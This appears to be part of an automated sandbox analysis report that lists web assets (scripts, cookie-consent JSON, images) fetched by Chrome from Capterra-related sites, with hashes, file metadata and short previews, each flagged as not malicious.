                                                                                                                                                                                                        SHA-512:1FCE0261D144AA64B40461786806635A3C367F393857FFC366DCC62CB3F595C2538AB0DC5ABEAF30A3090A73CBF60DF3F6416290DE3214991F6DA6AE4B96AE10
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdn.cookielaw.org/consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/018fce69-2081-771f-b4c1-f49c8e55a112/en.json
                                                                                                                                                                                                        Preview:{"DomainData":{"pclifeSpanYr":"Year","pclifeSpanYrs":"Years","pclifeSpanSecs":"A few seconds","pclifeSpanWk":"Week","pclifeSpanWks":"Weeks","pccontinueWithoutAcceptText":"Continue without Accepting","pccloseButtonType":"Icon","MainText":"Do Not Share My Personal Information","MainInfoText":"Capterra may share your information with trusted partners to customize your experience and show you ads outside of Capterra.com. If you would like to opt out of this sharing, select the option below. Please note that this choice only impacts certain marketing activities. To further manage your cookie preferences, refer to the <a href=\"https://www.capterra.com/legal/cookie-policy/\">Cookie Policy</a> for more information.","AboutText":"","AboutCookiesText":"Your Privacy","ConfirmText":"","AllowAllText":"Save Settings","CookiesUsedText":"Cookies used","CookiesDescText":"Description","AboutLink":"","ActiveText":"Active","AlwaysActiveText":"Always Active","AlwaysInactiveText":"Always Inactive","PCShowA
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (11315), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):11315
                                                                                                                                                                                                        Entropy (8bit):5.349789886754914
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:mh5B5CxdAiIhavC4zKd4TYzCaVdP/kCgdCJ/Cb4CkdglCNmtdjBLCpmCVT0mEjCp:mOdjUCzKdnVdud96d1adZCOpZdCJ
                                                                                                                                                                                                        MD5:1146B760CE11CD2AA55780CFFD213EF4
                                                                                                                                                                                                        SHA1:889B87CCFE1D79E1127DF92A16705955E99D3F94
                                                                                                                                                                                                        SHA-256:F76DCA947C9545F4F9C47A54C386670DE48D9159AA16125D2624698D2B21E2D7
                                                                                                                                                                                                        SHA-512:D784D800A4705AC1D8D796CB88870EBDE518F8359760B5E2D7CBFE3C6ED8C40FE5C2B2B248BD9C4CC95AF2980C2FA1ADA19235EB8CE72C66A100F0395BF6CB32
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5430],{67389:function(e,t,r){r.d(t,{Z:function(){return s}});var n=r(2784),o=r(2550),a=r(16734),l=r(94673);function i(e){return(i="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var c=["className","color","isInteractive","padding","children","colorMode"];function u(){return(u=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var f=n.forwardRef(function(e,t){var r,f,s,d=e.className,p=e.color,b=e.isInteractive,v=e.padding,y=e.children,m=e.colorMode,O=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},a=Object.keys(e);for(n=0;n<a.length;n++)r=a[n],t.indexOf(r)>=0||(o[r]=e[r
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65252)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):290101
                                                                                                                                                                                                        Entropy (8bit):5.329038395011431
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:lqUQlUFvdbyWnQxzU0p7hVmUK0JVWHp89RdEnXIeK0rr3PtU0:wUQlapmU0pNVmUKEg89MnY70r
                                                                                                                                                                                                        MD5:B089A2348410552483E1225E78046183
                                                                                                                                                                                                        SHA1:C4834AC108EF9CF654FAA886273EB413FA7EEDB5
                                                                                                                                                                                                        SHA-256:29F359572390A59C6A6DD92FEDEB480F7DED103C7C9B3430B192E21868858AA4
                                                                                                                                                                                                        SHA-512:D478F5B37067DFCE07A4E819F00300FC1B25C9E80F94EBAABA0378384299345D50E73A252966FD98E7B0D746EA6D35217D24E622D204BD20A6FD5667847410D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview://!This code is part of the Services provided by FullStory, Inc. For license information, please refer to https://www.fullstory.com/legal/terms-and-conditions/.//!Portions of this code are licensed under the following license:.//! For license information please see fs.js.LEGAL.txt ."use strict";!function(){var t=function(n,i){return(t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])})(n,i)};function n(n,i){if("function"!=typeof i&&null!==i)throw new TypeError("Class extends value "+String(i)+" is not a constructor or null");function r(){this.constructor=n}t(n,i),n.prototype=null===i?Object.create(i):(r.prototype=i.prototype,new r)}var i=function(){return i=Object.assign||function(t){for(var n,i=1,r=arguments.length;i<r;i++)for(var e in n=arguments[i])Object.prototype.hasOwnProperty.call(n,e)&&(t[e]=n[e]);return t},i.apply(this,arguments)};function r(t,n,i,r){return n
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (27662), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):27670
                                                                                                                                                                                                        Entropy (8bit):5.433430624649288
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:Qm2SRuvi3w2mhLhJhew0jaoxo0+QCNXxGxVpL60m/YeF4CAn1A:s2sQeBG8
                                                                                                                                                                                                        MD5:9C07E45B7E639FBCC445886195080EFC
                                                                                                                                                                                                        SHA1:FA5CB7398D959E54CA5BE95818A2E122F233C2D0
                                                                                                                                                                                                        SHA-256:3B720754D614D7B4506ABD37FDCE8D6729C29A1B464FDC3375B140BA4BFFD52A
                                                                                                                                                                                                        SHA-512:06BE8323ECFE7E372B6E7CE4DC325F27B924AF052B318F9AD353C089651F3040D354A6356624A299760735EB6B48F7CAFEB7E34E1BAD48D372E598C6590688C4
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/4977-d2b73f8557192c38.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4977],{8271:function(e,t,n){n.d(t,{z:function(){return N},Z:function(){return b}});var s=n(27573),a=n(38458),i=n(62780),l=n(57908),r=n(34617),o=n(19942),d=n(7653),c=n(81731),m=n(32012),x=n(78713),u=n(84318);let v=e=>({name:"engagement_product_click",engagement_component:"review-card",engagement_destination:e?"expand_review-card":"collapse_review-card",engagement_details:e?"text-button_expand_review-card":"text-button_collapse_review-card"}),p={name:"engagement_hover",engagement_component:"review-card",engagement_destination:"show_rating-breakdown",engagement_details:"tooltip_overall-rating"},h={name:"engagement_hover",engagement_component:"review-card",engagement_destination:"show_tooltip_incentivized",engagement_details:"chip_tooltip-incentivized"},g=e=>{let t,n;return"linkedin"===e&&(t="show_tooltip_linkedin-verified",n="chip_tooltip-linkedin-verified"),"non-anonymous"===e&&(t="show_tooltip_non-anonymous-verified",
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):24
                                                                                                                                                                                                        Entropy (8bit):3.8868421881310122
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:HE9vZ6n:SMn
                                                                                                                                                                                                        MD5:0C5DAD92482D9A7C7C253510F5082465
                                                                                                                                                                                                        SHA1:534B458F99B4D0BB90C2CF2C4BB3703EF44A52BF
                                                                                                                                                                                                        SHA-256:5DBAF0A4FF0F8AC8C1B67550EEE84390B089604FFAF71183E417636C7E183AC5
                                                                                                                                                                                                        SHA-512:3B889A1DB2E3D3184886111A1B20FC54E6F14B006DB29B1D92741AF5C0A5B8299E78CDF6939437915F2B350E0BFC781BB8E96D4119172FF0CD2CB178487D71E0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://js.driftt.com/core/assets/css/16.22abfce0.chunk.css
                                                                                                                                                                                                        Preview:body{margin:0;padding:0}
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3981), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3981
                                                                                                                                                                                                        Entropy (8bit):5.164514505172552
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:moFHFpRkbnwUw94IEvfxKje+LlhphlKYFG9gLNqIfqdQF6OD31U/VhXMklln:moNDHp/u06S6sk/hn
                                                                                                                                                                                                        MD5:03D3E13621569666362C73075E001CD9
                                                                                                                                                                                                        SHA1:75DAFDFC13E5457B011BADA4DD9A02A38815652E
                                                                                                                                                                                                        SHA-256:35A21F297F26AA71038E3236CCDD95EADC965042E916B8F789C548A8EE1D29E8
                                                                                                                                                                                                        SHA-512:AE9200D647DC2BC87C3B8789C3611E6D81F0EC800878B81F0E85D70AC510458F8A7668BD9F2E79821C6A68E436BBD0CDFC8AD8DB7A858937D999A0FCE8A947EE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/rlbEn55nmth45KPaQkAHZ/_buildManifest.js
                                                                                                                                                                                                        Preview:self.__BUILD_MANIFEST=function(s,e,a,c,t,i,r,d,o,n,u,h,f,p,k,v,b,l,w,j,y,m,g,_,I,T){return{__rewrites:{afterFiles:[{has:s,source:"/",destination:"/index"},{has:s,source:"/workspace/auth/callback",destination:k},{has:s,source:"/healthcheck",destination:"/api/healthcheck"},{has:s,source:"/search",destination:v},{has:s,source:"/search/:slugs*",destination:b},{has:s,source:"/products/new/:productId",destination:r},{has:s,source:"/products/new-dynamic/:productId",destination:l},{has:s,source:"/products/new/:productId/:campaignId",destination:r},{has:s,source:"/products/thank-you/:reviewId",destination:w},{has:s,source:"/providers/thank-you/:reviewId",destination:j},{has:s,source:"/providers/new/:providerId",destination:y},{has:s,source:"/providers/search",destination:m},{has:s,source:"/validate/:reviewType/thank-you",destination:g},{has:s,source:"/validate/:reviewType/:token",destination:_},{has:s,source:"/v/:linkType/:token",destination:I},{has:s,source:"/new/:localId",destination:d},{has:
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65252)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):290101
                                                                                                                                                                                                        Entropy (8bit):5.329038395011431
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3072:lqUQlUFvdbyWnQxzU0p7hVmUK0JVWHp89RdEnXIeK0rr3PtU0:wUQlapmU0pNVmUKEg89MnY70r
                                                                                                                                                                                                        MD5:B089A2348410552483E1225E78046183
                                                                                                                                                                                                        SHA1:C4834AC108EF9CF654FAA886273EB413FA7EEDB5
                                                                                                                                                                                                        SHA-256:29F359572390A59C6A6DD92FEDEB480F7DED103C7C9B3430B192E21868858AA4
                                                                                                                                                                                                        SHA-512:D478F5B37067DFCE07A4E819F00300FC1B25C9E80F94EBAABA0378384299345D50E73A252966FD98E7B0D746EA6D35217D24E622D204BD20A6FD5667847410D7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/fsrelay/s/fs.js
                                                                                                                                                                                                        Preview://!This code is part of the Services provided by FullStory, Inc. For license information, please refer to https://www.fullstory.com/legal/terms-and-conditions/.//!Portions of this code are licensed under the following license:.//! For license information please see fs.js.LEGAL.txt ."use strict";!function(){var t=function(n,i){return(t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,n){t.__proto__=n}||function(t,n){for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])})(n,i)};function n(n,i){if("function"!=typeof i&&null!==i)throw new TypeError("Class extends value "+String(i)+" is not a constructor or null");function r(){this.constructor=n}t(n,i),n.prototype=null===i?Object.create(i):(r.prototype=i.prototype,new r)}var i=function(){return i=Object.assign||function(t){for(var n,i=1,r=arguments.length;i<r;i++)for(var e in n=arguments[i])Object.prototype.hasOwnProperty.call(n,e)&&(t[e]=n[e]);return t},i.apply(this,arguments)};function r(t,n,i,r){return n
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15203), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):15203
                                                                                                                                                                                                        Entropy (8bit):5.241773285592657
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:PKVMDCfCkVsL/cacMVV+CjcvKYysVkObyVFlGVlm:DCfCHLANSYyQMP
                                                                                                                                                                                                        MD5:B86B7BE7EF763E6EFDD039EFE5796548
                                                                                                                                                                                                        SHA1:944302C1C2BC9C8B1DAC2FDF02E0DB0209168DB9
                                                                                                                                                                                                        SHA-256:A92AE25754346ECB64821487319A6BDDE99595BEDEEE583D4C0140E2C5225350
                                                                                                                                                                                                        SHA-512:BAF38EBA134E7631518FD36F01871D5DBB1799A57F74A3E5D0AA85E82D8F168C3CBA12F77A0C6E6A8A00DFC041FC39156CD55A7322C7379CCAA9F38215BE51ED
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6310],{70947:function(e,t,r){r.d(t,{Z:function(){return k}});var n,o=r(2784),i=r(2550),l=r(16734),a=function(){},c=o.createContext({isOpen:!1,isGapless:!1,show:a,hide:a,triggerRef:null,align:"left"}),u=r(90051),s=["children","className","selected","disabled"];function f(){return(f=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var p=o.forwardRef(function(e,t){var r=e.children,n=e.className,a=e.selected,c=e.disabled,u=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)r=i[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(n=0;n<i.length;n++)r=i[n],!(t.indexOf(r)>=0)&&Object.prototype.propertyIsEnumerable.call(e,r)&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):19
                                                                                                                                                                                                        Entropy (8bit):3.4713544870139303
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:dRYtyn:Tuyn
                                                                                                                                                                                                        MD5:34C520D87664032692C4315FFF455D18
                                                                                                                                                                                                        SHA1:978C8B03E97680EB62057A7000F6E7FD97FB9658
                                                                                                                                                                                                        SHA-256:C40AA69F0B306CEA296DD1193C334BC0781587ED51AAB579C0433698BA9E0C4B
                                                                                                                                                                                                        SHA-512:BC6ECF7B39E2C5882C693072A7F541A7C03117A28D14067FED6FDAB6BD455FD8E79C6FE9B81FDF327E64814B91ACEE6F9C1A62134C32CF39731477B712466F38
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:Method Not Allowed.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 170 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5816
                                                                                                                                                                                                        Entropy (8bit):7.948291195516615
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:kGLwJL1j7MNZrofM0QrcAPhTpVmXmDyzhf3qyaSP9KxsqbPuQoZj:0JL6NCQrXPhTbDyzFqy76uJd
                                                                                                                                                                                                        MD5:709917781B5C91BC2F2552E09DC2BCCD
                                                                                                                                                                                                        SHA1:0FD9DB8D88EA80C44CCCBDAA2627BB7949408DC1
                                                                                                                                                                                                        SHA-256:A46C926C07B88291817428C058225784C4A30688EB782A69C13E926A8A2A8FE4
                                                                                                                                                                                                        SHA-512:99EF0B28AEF2403148DC70C7BC3AD42B5EFF0E7F7D4AC662BA39ED24A783FAAB8237509ADEF41EF1DF90D7933BCB6BA4B6BBDA7F20532BA6F22B9BA44880A4AA
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/Trustpilot_logo.png
                                                                                                                                                                                                        Preview:.PNG........IHDR..............W.L....gAMA......a....8eXIfMM.*.......i...................................................+IDATx....T...R.{..4.4."..Q.....m.ED....7..[\2C4.q..q.1.8.o.D'~2F....k...EE.0.,.v7k.4MS.U........EuwuS...}.r.9.{..+.#....j ........:...p].K*^V.....L.}.+7....?w.I&.fie5.QC-v..Z.ui}`.Y.f5.I.d.P.f.`~ny .>3.Bfie5.1C...UA.r':Q.pm{..G....j S.....T>.....0.j..otD.....j c..u.cL.*s#.a...N..UoV...@F.u.3.l#j\..e.,.ft..U9~Y.f5p(....%..rM.d.z.8xU.Ns>..u(.e.f5.k #..n..a..~:H)..0h..n`..(...8.....VUYX.d..6r..cF..n...d3Y.t]..l...g..,k..m].}..,..i.V.r._..Y.tW..l.f.q..Q.....a..m.8`;.........C3T.0#.1.5..t(7..9.%<.dCV....s.U=.a.(.........qs....q^7.V..e.O...]T.0["..~]^...F6..M..0"V.i.o.;..={..r...z'..m;.u...4<X..S.Z5....7.ao.v....5..%%%=........C{....y.<P.....9g..r...:.+0..:..e..m..Y.....,.....;..vJ..B.........G...=&..........t%.8.......&t.........?......,......u.9<^.....n.x..._D.H.srrV`..(..G?..7///RSS....1.6.D..+/8..\..x.K>FG.+5.\....aO70Q....za
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 300 x 42, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8876
                                                                                                                                                                                                        Entropy (8bit):7.912328495402911
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:beqmzSCWfMMNxEoyEcoSeiM7jE71PiJscLnUrCSDeQMME:beqm2fTbEREM2jEpPLcYCTQTE
                                                                                                                                                                                                        MD5:C2C70DF4C28E97C5FA3FD5EF2CC61D0E
                                                                                                                                                                                                        SHA1:17631C1D165E53BD756DCAEE775B166DBEC97B6B
                                                                                                                                                                                                        SHA-256:7446299C8ECAC64E6AAEBD803039B03C4283C14C0C50CA3486A3CE80D0974F4F
                                                                                                                                                                                                        SHA-512:547DAC789002B185617330D95F6DAACF6622A2918EA5596405675D37C70473AAEE6D129EC1FE338B62A61C375607363B762B185BD386EF59C5CE6453A3DFDFE2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://img.pblc.it/i/300x0x8.f.DOST/x/created_in_publicate.png
                                                                                                                                                                                                        Preview:.PNG........IHDR...,...*......Sf.....pHYs..........+.... .IDATx..]{...u.....j..X...8.r].:....C...2sy?...$@.u..IJ.."'%..4....;$<..3@...8..B....\.,.ZY.eY...Z..?.......Jm.....}.8.8s...f..4....Dt.o.CD....=7].:....1'kI;..,.?$._.T.c.K...[k.........X.`:3...3...v..2.SD...Q.TtL..$..v..N.1.SZ.^..*o.8+i..M....&S......:.(4Q.w....D....[I9%.>.,&.N.../i.T...*./...`...>KD...df.Q.nG}..?..m...y#...Z...\..CmPG........T.....~.y.i....~G....).'.us.1.iK....S.)..ZJ.R&9..+...:..Z...Z...2..u..t.le.{..I..XnQ+..7......9.w..,..1.S.u.B..].?....du,.Hzq..N.:.i.^)....RZ.:...T..D)..(.~f....0.._..(...&.1f~..Vk....G.UX.:.c.M.N%..T.;..P..M.....r.nn.p.'.V....SG.R....I[..KV*q...<........U...r..m.W..Va[...K[.X..`..z.X.S)...O#.o.L.....7.>.....D.H....N..%.\N.^.-.G..}......<..r..3.Q6.............g....Fl....c..]*...,..;.<c...2...yC......14&K...Si.%.&5~j..V..|}.X...&|.$/Q..Q..Q.u._.l..s:...8U.|G~..q......w..........a..6q...P..y...i.%./d.MF.RYc.Uj..-.1."5Wcs-Vo.}r.....fm.__.:.E.JL.:..^
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):4334
                                                                                                                                                                                                        Entropy (8bit):7.928814106085763
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:oWCEBXj0wY6quBY8Y1FtcKb/Ojpm/LsUNQELsWQPPp8vWFtTVlfGbG+RPHj84xvQ:oWBJj0wY6quW8SCpmo3p8vWXLGHRPHjY
                                                                                                                                                                                                        MD5:0CB0FAA41A45ABD8FFED48127754CCF0
                                                                                                                                                                                                        SHA1:68CDC6D3BBB117929CFB3FF2AEA61321B52F6F7A
                                                                                                                                                                                                        SHA-256:62EF18015027FFA3F61C08065C506B744C46BB739157BCD69DFAD325600731CD
                                                                                                                                                                                                        SHA-512:CE7C935070FD32241D841500436B9A9216394C3211EA6D1FB1093B6CF3DF348103C1C9F706EFD2B772F9C23BE3421AF47BB6B29DCA9E3DEED65D28C8523A5FE5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^..t.U...{..=..I.1.l.. *.Q.Aqa....p..o.0.:.S.'..G\..PQ...p.1D..`T. ...d.}..{..$.tH:..;.......[U_.... J)p~|po.p...Z%.h..U..V..Z%.h..U..V..Z%.h..U..V..Z%.h..U..V..Z%.h..U..V..Z%.h..U..V..Z%.h..U..V..Z%.h..U..V..Z%4./Z\......$.^8k.#?S...?wP?..........'.:..:g.~...C.......?]./.[*.8G.4...]...o.m..;...l.A.H.5.mDG.E)..3...B...C.P.z....?......#.......\.Jp.*.E.....\...R_..!.x..L(F.d......rS.......P...F...},.R....d..........#...@}k.{7i.S..F.Pa.v.p....Ef.I.T...C5.o......F.{.[..Z4..fi'.4..a.5.d.'o.U...|...)....x.c..+.....A.9..Rq.n...1E&.iD#.....?...#.K.....G .......p..| ..F....sfZ.C....|.s..w..A.(6.....f.."|....z.......r..........o..y.{..._xv:....].....-.......+..t..I4bm......j.X..#b.S}.6&.h....5.kO...s......B..).................c...P.T......w..9s.-..$.u.[ D..S..GT...m.*]7y..z...{..&0..:v...w.N.m.k.5h....Y...H...!..Lq.g.E....\.H....\>..&n...+u....n..4.j.A.L...qH<.....n.#,........Q,..d..$z.3.u...i...L=
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4515
                                                                                                                                                                                                        Entropy (8bit):7.131799630903129
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jy5N26MT0D5MdtbZPAVwzVJeoS3WLyi3Tu:+7uoYNMtKwXeXGLyN
                                                                                                                                                                                                        MD5:4135825DCB043BC20BB3C8F1D000CC93
                                                                                                                                                                                                        SHA1:1443A3FD645B9F86076A39E6081B42352EE59872
                                                                                                                                                                                                        SHA-256:3DFE1CBDB49D1FEDB49B9CA71FBB8C474E6D8FF3C7507CFDAAF7898C13EF4C9C
                                                                                                                                                                                                        SHA-512:86709F405DE8DD06638DCA9BD48C0C01473434CAD142EE0BC9D955FA709F75904B25F8ABCBC5023B1373B284FAD2C0D5251AA6AA165D9F8E6E5C1CDCDA7FDCC6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/0c617aed-05cb-4242-a1ed-7a7e79c76fb7.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............J...Y.............@...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):54335
                                                                                                                                                                                                        Entropy (8bit):7.990119241419708
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:1536:utSS1uxdkiEOzim6WW5d6Wo3raBi09Rf9:uYxdkPZJWWLBia9
                                                                                                                                                                                                        MD5:4EC6A4EA5DDBFF3DE814E6F1233E36BE
                                                                                                                                                                                                        SHA1:3A47687B47B43B8F1A105C8B103D36548DE05A4F
                                                                                                                                                                                                        SHA-256:561EF859B06E2EBD6BB37200780C2ADB4CB64482B1FE931B612162BCD1E8CDE1
                                                                                                                                                                                                        SHA-512:4FF1E31608643C6D6A72ECBEBEA751C9F621F9863EEABBA51B52C24B328CB8C0C7B662515E4F70CD70D53D60C838D181A380C9541AF1D484E1A04216DC37AE08
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/template4-p-500.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTELiqaaa...........................:<JFHUZZZ...........S.....H=...........;;>......KD;..O.........`]U......ogJ....!4...,-=..................#.."..#.. ........$.. .. .. ..".. ..".."..... ..!..".. .....!.. ........... ..'..... ............z{...... ......#....!.....&.. ........ ....... #.................... ............. ...{........ux....$.......%'$.....#WZ#............9;.-0$R0.!"......_c#...HJ.'(....[9"23......,.....AC.^`... ,-....69$FJ$67Ffj$NR$PR.nq........gD,fh...0LN[01A>A$WY.YZf.......................%'7..#.......!.................vR8.....$*,<....jkv...nr%....%^`l..%pr|..._D #5cep..$..!..#...RT`..$qy.@BP..#=?M...jO.......0O..#....tY..#.U....hz.EGU.~d......J*..Ah...".........}.......58I.....f...n...e..\qwy........4...u:TS(BC!|.Kgf|}r^RFE.....n....tRNS......................,..p....^.F:.L.;......w.......pHYs............... .IDATx..k...........v...=..z....(...2#....!A.#.t(....!@.........[[....b.Q...$c8....$.#i.|.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8462
                                                                                                                                                                                                        Entropy (8bit):7.973895480919111
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:oP/Xz0tZDY9bHaLvokAKTqF0IvCLNB6RdvZDzzLs9Mj3+wgLXJoxsMiN:oP/Xz8D4aLGse0xL67DD7j+wioyMU
                                                                                                                                                                                                        MD5:30EAA841863A69FA5B3685DBC4DA542D
                                                                                                                                                                                                        SHA1:6C25F19CAB50E33DC9424BE3C70C3806C0875439
                                                                                                                                                                                                        SHA-256:297C4ED3EFAE5BF695F183CEBD8B58C37E3189B08ED4B0FBFA4454287CF1F15B
                                                                                                                                                                                                        SHA-512:193CEF09419EDE26D0185DE528A8AC58C9FD245563BAFC6747EBD1DB16AF876F0B46D82583399F928645F769393C8FFD0AEE9683AFB39A2C2DD4D5372F13C1F6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
